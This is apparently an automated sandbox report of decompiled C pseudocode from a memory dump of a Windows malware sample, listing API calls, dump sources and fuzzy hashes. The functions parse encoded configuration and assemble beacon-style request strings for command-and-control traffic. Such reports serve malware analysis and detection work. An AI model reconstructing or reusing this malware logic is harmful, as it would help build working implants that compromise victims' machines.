                                					_t45 = 8;
                                					if(_v12 < _t45) {
                                						_t45 = 1;
                                						__eflags = 1;
                                					} else {
                                						_t32 =  *0x52fa2d4; // 0x215d5a8
                                						_t11 = _t32 + 0x52fbd54; // 0x74592fc
                                						_t48 = _t11;
                                						_t12 = _t32 + 0x52fbd08; // 0x4f0053
                                						_t52 = E052F5D37(_t11, _t12, _t11);
                                						_t59 = _t52;
                                						if(_t52 != 0) {
                                							_t35 =  *0x52fa2d4; // 0x215d5a8
                                							_t13 = _t35 + 0x52fbd9e; // 0x30314549
                                							if(E052F74B6(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
                                								_t61 =  *0x52fa2b4 - 6;
                                								if( *0x52fa2b4 <= 6) {
                                									_t42 =  *0x52fa2d4; // 0x215d5a8
                                									_t15 = _t42 + 0x52fbbaa; // 0x52384549
                                									E052F74B6(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                                								}
                                							}
                                							_t38 =  *0x52fa2d4; // 0x215d5a8
                                							_t17 = _t38 + 0x52fbd98; // 0x7459340
                                							_t18 = _t38 + 0x52fbd70; // 0x680043
                                							_t45 = E052F1F7A(_v8, 0x80000001, _t52, _t18, _t17);
                                							HeapFree( *0x52fa290, 0, _t52);
                                						}
                                					}
                                					HeapFree( *0x52fa290, 0, _v16);
                                				}
                                				_t54 = _v8;
                                				if(_v8 != 0) {
                                					E052F3C84(_t54);
                                				}
                                				return _t45;
                                			}


















                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,07459340,?,00000000,30314549,00000014,004F0053,074592FC), ref: 052F1BA4
                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052F20B0), ref: 052F1BB6
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                C-Code - Quality: 94%
                                			E052F2206(int* __ecx) {
                                				int _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* __esi;
                                				signed int _t26;
                                				signed int _t31;
                                				signed int _t37;
                                				char* _t43;
                                				char* _t44;
                                				char* _t45;
                                				char* _t46;
                                				char* _t47;
                                				void* _t48;
                                				void* _t49;
                                				intOrPtr _t50;
                                				signed int _t56;
                                				void* _t58;
                                				void* _t59;
                                				signed int _t61;
                                				signed int _t65;
                                				signed int _t69;
                                				signed int _t73;
                                				signed int _t77;
                                				signed int _t81;
                                				void* _t86;
                                				intOrPtr _t102;
                                
                                				_t87 = __ecx;
                                				_t26 =  *0x52fa2d0; // 0x63699bc3
                                				if(E052F1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
                                					 *0x52fa324 = _v8;
                                				}
                                				_t31 =  *0x52fa2d0; // 0x63699bc3
                                				if(E052F1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                					_v12 = 2;
                                					L50:
                                					return _v12;
                                				}
                                				_t37 =  *0x52fa2d0; // 0x63699bc3
                                				if(E052F1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                					L48:
                                					HeapFree( *0x52fa290, 0, _v16);
                                					goto L50;
                                				} else {
                                					_t86 = _v12;
                                					if(_t86 == 0) {
                                						_t43 = 0;
                                					} else {
                                						_t81 =  *0x52fa2d0; // 0x63699bc3
                                						_t43 = E052F38CE(_t87, _t86, _t81 ^ 0x724e87bc);
                                					}
                                					if(_t43 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                							 *0x52fa298 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t44 = 0;
                                					} else {
                                						_t77 =  *0x52fa2d0; // 0x63699bc3
                                						_t44 = E052F38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
                                					}
                                					if(_t44 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                							 *0x52fa29c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t45 = 0;
                                					} else {
                                						_t73 =  *0x52fa2d0; // 0x63699bc3
                                						_t45 = E052F38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
                                					}
                                					if(_t45 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                							 *0x52fa2a0 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t46 = 0;
                                					} else {
                                						_t69 =  *0x52fa2d0; // 0x63699bc3
                                						_t46 = E052F38CE(_t87, _t86, _t69 ^ 0x0602e249);
                                					}
                                					if(_t46 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                							 *0x52fa004 = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t47 = 0;
                                					} else {
                                						_t65 =  *0x52fa2d0; // 0x63699bc3
                                						_t47 = E052F38CE(_t87, _t86, _t65 ^ 0x3603764c);
                                					}
                                					if(_t47 != 0) {
                                						_t87 =  &_v8;
                                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                							 *0x52fa02c = _v8;
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t48 = 0;
                                					} else {
                                						_t61 =  *0x52fa2d0; // 0x63699bc3
                                						_t48 = E052F38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
                                					}
                                					if(_t48 != 0) {
                                						_push(_t48);
                                						_t58 = 0x10;
                                						_t59 = E052F3E49(_t58);
                                						if(_t59 != 0) {
                                							_push(_t59);
                                							E052F50DF();
                                						}
                                					}
                                					if(_t86 == 0) {
                                						_t49 = 0;
                                					} else {
                                						_t56 =  *0x52fa2d0; // 0x63699bc3
                                						_t49 = E052F38CE(_t87, _t86, _t56 ^ 0xb30fc035);
                                					}
                                					if(_t49 != 0 && E052F3E49(0, _t49) != 0) {
                                						_t102 =  *0x52fa37c; // 0x7459630
                                						E052F10DD(_t102 + 4, _t54);
                                					}
                                					_t50 =  *0x52fa2d4; // 0x215d5a8
                                					_t20 = _t50 + 0x52fb252; // 0x74587fa
                                					_t21 = _t50 + 0x52fb7b5; // 0x6976612e
                                					 *0x52fa320 = _t20;
                                					 *0x52fa390 = _t21;
                                					HeapFree( *0x52fa290, 0, _t86);
                                					_v12 = 0;
                                					goto L48;
                                				}
                                			}


                                APIs
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F22AB
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F22DD
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F230F
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2341
                                • StrToIntExA.SHLWAPI(00000000,00000000,052F55D3,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2373
                                • HeapFree.KERNEL32(00000000,?,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F240F
                                • HeapFree.KERNEL32(00000000,?,?,052F55D3,63699BC3,?,?,63699BC3,052F55D3,?,63699BC3,E8FA7DD7,052FA00C,74ECC740), ref: 052F2422
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                • Opcode ID: f12869f7f55a2d08b03db7cc978944647a8d1f06c520989a6cadab570bad3518
                                • Instruction ID: 1c3fbb1a38fa765b5608431692dce691b71ce09262adb54d900ca9fbc88f42d4
                                • Opcode Fuzzy Hash: f12869f7f55a2d08b03db7cc978944647a8d1f06c520989a6cadab570bad3518
                                • Instruction Fuzzy Hash: E0615CB5B34105EAC715DBB5FD8DC5EBBA9BF49610B140936B60AE3240EB31D9409B20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 70%
                                			E052F6EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                				intOrPtr _v4;
                                				intOrPtr _v8;
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				void* _v24;
                                				intOrPtr _v40;
                                				void* __ecx;
                                				void* __edi;
                                				intOrPtr _t31;
                                				intOrPtr _t32;
                                				intOrPtr _t33;
                                				intOrPtr _t34;
                                				intOrPtr _t35;
                                				void* _t38;
                                				intOrPtr _t39;
                                				int _t42;
                                				void* _t43;
                                				intOrPtr _t44;
                                				intOrPtr _t48;
                                				intOrPtr _t52;
                                				intOrPtr _t55;
                                				intOrPtr _t56;
                                				intOrPtr _t62;
                                				intOrPtr _t66;
                                				intOrPtr* _t68;
                                				intOrPtr _t78;
                                				intOrPtr _t81;
                                				intOrPtr _t84;
                                				int _t87;
                                				intOrPtr _t88;
                                				int _t91;
                                				intOrPtr _t92;
                                				int _t95;
                                				void* _t98;
                                				void* _t99;
                                				void* _t103;
                                				intOrPtr _t105;
                                				long _t107;
                                				intOrPtr _t108;
                                				intOrPtr* _t109;
                                				long _t110;
                                				int _t111;
                                				void* _t112;
                                				void* _t113;
                                				void* _t114;
                                				void* _t115;
                                				void* _t117;
                                				void* _t118;
                                				void* _t120;
                                				void* _t121;
                                
                                				_t103 = __edx;
                                				_t110 = __eax;
                                				_v8 = 8;
                                				_t117 = RtlAllocateHeap( *0x52fa290, 0, 0x800);
                                				if(_t117 != 0) {
                                					if(_t110 == 0) {
                                						_t110 = GetTickCount();
                                					}
                                					_t31 =  *0x52fa018; // 0x4934a3dd
                                					asm("bswap eax");
                                					_t32 =  *0x52fa014; // 0x5cb11ae7
                                					asm("bswap eax");
                                					_t33 =  *0x52fa010; // 0x15dc9586
                                					asm("bswap eax");
                                					_t34 =  *0x52fa00c; // 0x69ab8210
                                					asm("bswap eax");
                                					_t35 =  *0x52fa2d4; // 0x215d5a8
                                					_t2 = _t35 + 0x52fb613; // 0x74666f73
                                					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x52fa02c,  *0x52fa004, _t110);
                                					_t38 = E052F6A09();
                                					_t39 =  *0x52fa2d4; // 0x215d5a8
                                					_t3 = _t39 + 0x52fb653; // 0x74707526
                                					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                					_t120 = _t118 + 0x38;
                                					_t112 = _t111 + _t42;
                                					if(_a12 != 0) {
                                						_t92 =  *0x52fa2d4; // 0x215d5a8
                                						_t7 = _t92 + 0x52fb65e; // 0x732526
                                						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                						_t120 = _t120 + 0xc;
                                						_t112 = _t112 + _t95;
                                					}
                                					_t43 = E052F5040(_t99);
                                					_t44 =  *0x52fa2d4; // 0x215d5a8
                                					_t9 = _t44 + 0x52fb302; // 0x6d697426
                                					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                					_t48 =  *0x52fa2d4; // 0x215d5a8
                                					_t11 = _t48 + 0x52fb2d7; // 0x74636126
                                					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                					_t52 =  *0x52fa32c; // 0x74595b0
                                					_t121 = _t120 + 0x1c;
                                					if(_t52 != 0) {
                                						_t88 =  *0x52fa2d4; // 0x215d5a8
                                						_t13 = _t88 + 0x52fb676; // 0x73797326
                                						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t91;
                                					}
                                					_t105 =  *0x52fa37c; // 0x7459630
                                					_a28 = E052F2885(0x52fa00a, _t105 + 4);
                                					_t55 =  *0x52fa31c; // 0x74595e0
                                					_t107 = 0;
                                					if(_t55 != 0) {
                                						_t84 =  *0x52fa2d4; // 0x215d5a8
                                						_t16 = _t84 + 0x52fb8da; // 0x3d736f26
                                						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                						_t121 = _t121 + 0xc;
                                						_t114 = _t114 + _t87;
                                					}
                                					_t56 =  *0x52fa318; // 0x0
                                					if(_t56 != _t107) {
                                						_t81 =  *0x52fa2d4; // 0x215d5a8
                                						_t18 = _t81 + 0x52fb8b1; // 0x3d706926
                                						wsprintfA(_t114 + _t117, _t18, _t56);
                                					}
                                					if(_a28 != _t107) {
                                						_t98 = RtlAllocateHeap( *0x52fa290, _t107, 0x800);
                                						if(_t98 != _t107) {
                                							E052F2DD0(GetTickCount());
                                							_t62 =  *0x52fa37c; // 0x7459630
                                							__imp__(_t62 + 0x40);
                                							asm("lock xadd [eax], ecx");
                                							_t66 =  *0x52fa37c; // 0x7459630
                                							__imp__(_t66 + 0x40);
                                							_t68 =  *0x52fa37c; // 0x7459630
                                							_t115 = E052F624D(1, _t103, _t117,  *_t68);
                                							asm("lock xadd [eax], ecx");
                                							if(_t115 != _t107) {
                                								StrTrimA(_t115, 0x52f92ac);
                                								_push(_t115);
                                								_t108 = E052F21C1();
                                								_v4 = _t108;
                                								if(_t108 != 0) {
                                									 *_t115 = 0;
                                									__imp__(_t98, _a8);
                                									_t109 = __imp__;
                                									 *_t109(_t98, _t108);
                                									 *_t109(_t98, _t115);
                                									_t78 = E052F1032(0xffffffffffffffff, _t98, _v12, _v8);
                                									_v40 = _t78;
                                									if(_t78 != 0 && _t78 != 0x10d2) {
                                										E052F1492();
                                									}
                                									HeapFree( *0x52fa290, 0, _v24);
                                								}
                                								HeapFree( *0x52fa290, 0, _t115);
                                								_t107 = 0;
                                							}
                                							HeapFree( *0x52fa290, _t107, _t98);
                                						}
                                						HeapFree( *0x52fa290, _t107, _a20);
                                					}
                                					HeapFree( *0x52fa290, _t107, _t117);
                                				}
                                				return _v16;
                                			}


                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 052F6F1A
                                • GetTickCount.KERNEL32 ref: 052F6F2E
                                • wsprintfA.USER32 ref: 052F6F7D
                                • wsprintfA.USER32 ref: 052F6F9A
                                • wsprintfA.USER32 ref: 052F6FBB
                                • wsprintfA.USER32 ref: 052F6FD9
                                • wsprintfA.USER32 ref: 052F6FEE
                                • wsprintfA.USER32 ref: 052F700F
                                • wsprintfA.USER32 ref: 052F7049
                                • wsprintfA.USER32 ref: 052F7069
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052F7084
                                • GetTickCount.KERNEL32 ref: 052F7094
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F70A8
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F70C6
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F624D: strcpy.NTDLL ref: 052F6297
                                  • Part of subcall function 052F624D: lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                • StrTrimA.SHLWAPI(00000000,052F92AC,00000000,07459630), ref: 052F70F4
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F21C1: lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                  • Part of subcall function 052F21C1: lstrcat.KERNEL32(00000000,?), ref: 052F21F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 052F7112
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F7120
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F7124
                                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 052F7154
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052F7163
                                • HeapFree.KERNEL32(00000000,00000000,00000000,07459630), ref: 052F7173
                                • HeapFree.KERNEL32(00000000,?), ref: 052F7184
                                • HeapFree.KERNEL32(00000000,00000000), ref: 052F7192
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
                                • String ID:
                                • API String ID: 1837416118-0
                                • Opcode ID: 9db775debda47f7b494e0f785d78d3ddc340c7e1ab68080f30f18d24d9381de7
                                • Instruction ID: 2c77efbb28f1fb58d31059ed37ad802e5fddfb70604af5fda75d39e5d27263ef
                                • Opcode Fuzzy Hash: 9db775debda47f7b494e0f785d78d3ddc340c7e1ab68080f30f18d24d9381de7
                                • Instruction Fuzzy Hash: 0E716F71624105AFD721DB68FC4EE5B7BE8FF88720B150539FA4EC3290DB36A8459B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 77%
                                			E052F46D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
                                				void* _v8;
                                				void* _v12;
                                				void* _v16;
                                				void* _v20;
                                				void* __ebx;
                                				void* __edi;
                                				long _t63;
                                				intOrPtr _t64;
                                				intOrPtr _t65;
                                				intOrPtr _t66;
                                				intOrPtr _t67;
                                				intOrPtr _t68;
                                				void* _t71;
                                				intOrPtr _t72;
                                				int _t75;
                                				void* _t76;
                                				intOrPtr _t77;
                                				intOrPtr _t81;
                                				intOrPtr _t85;
                                				intOrPtr _t86;
                                				void* _t88;
                                				void* _t91;
                                				intOrPtr _t95;
                                				intOrPtr _t99;
                                				intOrPtr* _t101;
                                				void* _t107;
                                				intOrPtr _t111;
                                				signed int _t115;
                                				char** _t117;
                                				int _t120;
                                				intOrPtr* _t123;
                                				intOrPtr* _t125;
                                				intOrPtr* _t127;
                                				intOrPtr* _t129;
                                				intOrPtr _t132;
                                				intOrPtr _t135;
                                				int _t138;
                                				intOrPtr _t139;
                                				int _t142;
                                				void* _t143;
                                				void* _t144;
                                				void* _t154;
                                				int _t157;
                                				void* _t158;
                                				void* _t159;
                                				void* _t160;
                                				intOrPtr _t161;
                                				void* _t163;
                                				long _t167;
                                				intOrPtr* _t168;
                                				intOrPtr* _t171;
                                				void* _t172;
                                				void* _t174;
                                				void* _t175;
                                				void* _t180;
                                
                                				_t154 = __edx;
                                				_t144 = __ecx;
                                				_t63 = __eax;
                                				_t143 = _a20;
                                				_a20 = 8;
                                				if(__eax == 0) {
                                					_t63 = GetTickCount();
                                				}
                                				_t64 =  *0x52fa018; // 0x4934a3dd
                                				asm("bswap eax");
                                				_t65 =  *0x52fa014; // 0x5cb11ae7
                                				asm("bswap eax");
                                				_t66 =  *0x52fa010; // 0x15dc9586
                                				asm("bswap eax");
                                				_t67 =  *0x52fa00c; // 0x69ab8210
                                				asm("bswap eax");
                                				_t68 =  *0x52fa2d4; // 0x215d5a8
                                				_t3 = _t68 + 0x52fb613; // 0x74666f73
                                				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x52fa02c,  *0x52fa004, _t63);
                                				_t71 = E052F6A09();
                                				_t72 =  *0x52fa2d4; // 0x215d5a8
                                				_t4 = _t72 + 0x52fb653; // 0x74707526
                                				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
                                				_t174 = _t172 + 0x38;
                                				_t158 = _t157 + _t75;
                                				if(_a8 != 0) {
                                					_t139 =  *0x52fa2d4; // 0x215d5a8
                                					_t8 = _t139 + 0x52fb65e; // 0x732526
                                					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
                                					_t174 = _t174 + 0xc;
                                					_t158 = _t158 + _t142;
                                				}
                                				_t76 = E052F5040(_t144);
                                				_t77 =  *0x52fa2d4; // 0x215d5a8
                                				_t10 = _t77 + 0x52fb302; // 0x6d697426
                                				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
                                				_t81 =  *0x52fa2d4; // 0x215d5a8
                                				_t12 = _t81 + 0x52fb7aa; // 0x7458d52
                                				_t180 = _a4 - _t12;
                                				_t14 = _t81 + 0x52fb2d7; // 0x74636126
                                				_t156 = 0 | _t180 == 0x00000000;
                                				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
                                				_t85 =  *0x52fa31c; // 0x74595e0
                                				_t175 = _t174 + 0x1c;
                                				if(_t85 != 0) {
                                					_t135 =  *0x52fa2d4; // 0x215d5a8
                                					_t18 = _t135 + 0x52fb8da; // 0x3d736f26
                                					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
                                					_t175 = _t175 + 0xc;
                                					_t160 = _t160 + _t138;
                                				}
                                				_t86 =  *0x52fa32c; // 0x74595b0
                                				if(_t86 != 0) {
                                					_t132 =  *0x52fa2d4; // 0x215d5a8
                                					_t20 = _t132 + 0x52fb676; // 0x73797326
                                					wsprintfA(_t160 + _t143, _t20, _t86);
                                					_t175 = _t175 + 0xc;
                                				}
                                				_t161 =  *0x52fa37c; // 0x7459630
                                				_t88 = E052F2885(0x52fa00a, _t161 + 4);
                                				_t167 = 0;
                                				_v12 = _t88;
                                				if(_t88 == 0) {
                                					L28:
                                					HeapFree( *0x52fa290, _t167, _t143);
                                					return _a20;
                                				} else {
                                					_t91 = RtlAllocateHeap( *0x52fa290, 0, 0x800);
                                					_a8 = _t91;
                                					if(_t91 == 0) {
                                						L27:
                                						HeapFree( *0x52fa290, _t167, _v12);
                                						goto L28;
                                					}
                                					E052F2DD0(GetTickCount());
                                					_t95 =  *0x52fa37c; // 0x7459630
                                					__imp__(_t95 + 0x40);
                                					asm("lock xadd [eax], ecx");
                                					_t99 =  *0x52fa37c; // 0x7459630
                                					__imp__(_t99 + 0x40);
                                					_t101 =  *0x52fa37c; // 0x7459630
                                					_t163 = E052F624D(1, _t156, _t143,  *_t101);
                                					_v20 = _t163;
                                					asm("lock xadd [eax], ecx");
                                					if(_t163 == 0) {
                                						L26:
                                						HeapFree( *0x52fa290, _t167, _a8);
                                						goto L27;
                                					}
                                					StrTrimA(_t163, 0x52f92ac);
                                					_push(_t163);
                                					_t107 = E052F21C1();
                                					_v8 = _t107;
                                					if(_t107 == 0) {
                                						L25:
                                						HeapFree( *0x52fa290, _t167, _t163);
                                						goto L26;
                                					}
                                					 *_t163 = 0;
                                					__imp__(_a8, _v12);
                                					_t168 = __imp__;
                                					 *_t168(_a8, _v8);
                                					_t111 = E052F4AA6( *_t168(_a8, _t163), _a8);
                                					_a4 = _t111;
                                					if(_t111 == 0) {
                                						_a20 = 8;
                                						L23:
                                						E052F1492();
                                						L24:
                                						HeapFree( *0x52fa290, 0, _v8);
                                						_t167 = 0;
                                						goto L25;
                                					}
                                					_t115 = E052F26C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
                                					_a20 = _t115;
                                					if(_t115 == 0) {
                                						_t171 = _v16;
                                						_a20 = E052F161A(_t171, _a4, _a12, _a16);
                                						_t123 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                						_t125 =  *((intOrPtr*)(_t171 + 8));
                                						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                						_t127 =  *((intOrPtr*)(_t171 + 4));
                                						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                						_t129 =  *_t171;
                                						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                						E052F50CA(_t171);
                                					}
                                					if(_a20 != 0x10d2) {
                                						L18:
                                						if(_a20 == 0) {
                                							_t117 = _a12;
                                							if(_t117 != 0) {
                                								_t164 =  *_t117;
                                								_t169 =  *_a16;
                                								wcstombs( *_t117,  *_t117,  *_a16);
                                								_t120 = E052F580E(_t164, _t164, _t169 >> 1);
                                								_t163 = _v20;
                                								 *_a16 = _t120;
                                							}
                                						}
                                						goto L21;
                                					} else {
                                						if(_a12 != 0) {
                                							L21:
                                							E052F50CA(_a4);
                                							if(_a20 == 0 || _a20 == 0x10d2) {
                                								goto L24;
                                							} else {
                                								goto L23;
                                							}
                                						}
                                						_a20 = _a20 & 0x00000000;
                                						goto L18;
                                					}
                                				}
                                			}


                                APIs
                                • GetTickCount.KERNEL32 ref: 052F46E8
                                • wsprintfA.USER32 ref: 052F4735
                                • wsprintfA.USER32 ref: 052F4752
                                • wsprintfA.USER32 ref: 052F4772
                                • wsprintfA.USER32 ref: 052F4790
                                • wsprintfA.USER32 ref: 052F47B3
                                • wsprintfA.USER32 ref: 052F47D4
                                • wsprintfA.USER32 ref: 052F47F4
                                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052F4825
                                • GetTickCount.KERNEL32 ref: 052F4836
                                • RtlEnterCriticalSection.NTDLL(074595F0), ref: 052F484A
                                • RtlLeaveCriticalSection.NTDLL(074595F0), ref: 052F4868
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6278
                                  • Part of subcall function 052F624D: lstrlen.KERNEL32(00000000,?,00000000,052F70D9,00000000,07459630), ref: 052F6280
                                  • Part of subcall function 052F624D: strcpy.NTDLL ref: 052F6297
                                  • Part of subcall function 052F624D: lstrcat.KERNEL32(00000000,00000000), ref: 052F62A2
                                  • Part of subcall function 052F624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,052F70D9,?,00000000,052F70D9,00000000,07459630), ref: 052F62BF
                                • StrTrimA.SHLWAPI(00000000,052F92AC,?,07459630), ref: 052F489D
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(074587FA,00000000,00000000,00000000,052F7100,00000000), ref: 052F21D1
                                  • Part of subcall function 052F21C1: lstrlen.KERNEL32(?), ref: 052F21D9
                                  • Part of subcall function 052F21C1: lstrcpy.KERNEL32(00000000,074587FA), ref: 052F21ED
                                  • Part of subcall function 052F21C1: lstrcat.KERNEL32(00000000,?), ref: 052F21F8
                                • lstrcpy.KERNEL32(00000000,?), ref: 052F48BD
                                • lstrcat.KERNEL32(00000000,?), ref: 052F48CF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 052F48D5
                                  • Part of subcall function 052F4AA6: lstrlen.KERNEL32(?,00000000,07459C98,74ECC740,052F13D0,07459E9D,052F55DE,052F55DE,?,052F55DE,?,63699BC3,E8FA7DD7,00000000), ref: 052F4AAD
                                  • Part of subcall function 052F4AA6: mbstowcs.NTDLL ref: 052F4AD6
                                  • Part of subcall function 052F4AA6: memset.NTDLL ref: 052F4AE8
                                • wcstombs.NTDLL ref: 052F4966
                                  • Part of subcall function 052F161A: SysAllocString.OLEAUT32(00000000), ref: 052F165B
                                  • Part of subcall function 052F50CA: HeapFree.KERNEL32(00000000,00000000,052F4239,00000000,00000001,?,00000000,?,?,?,052F6B8D,00000000,?,00000001), ref: 052F50D6
                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 052F49A7
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052F49B7
                                • HeapFree.KERNEL32(00000000,00000000,?,07459630), ref: 052F49C7
                                • HeapFree.KERNEL32(00000000,?), ref: 052F49D7
                                • HeapFree.KERNEL32(00000000,?), ref: 052F49E5
                                Memory Dump Source
                                • Source File: 00000006.00000002.409924400.00000000052F1000.00000020.00000001.sdmp, Offset: 052F0000, based on PE: true
                                • Associated: 00000006.00000002.409916806.00000000052F0000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409937275.00000000052F9000.00000002.00000001.sdmp
                                • Associated: 00000006.00000002.409958443.00000000052FA000.00000004.00000001.sdmp
                                • Associated: 00000006.00000002.409970762.00000000052FC000.00000002.00000001.sdmp
                                Similarity
                                • API ID: Heapwsprintf$Free$lstrlen$lstrcat$CountCriticalSectionTickTrimlstrcpy$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                • String ID:
                                • API String ID: 972889839-0
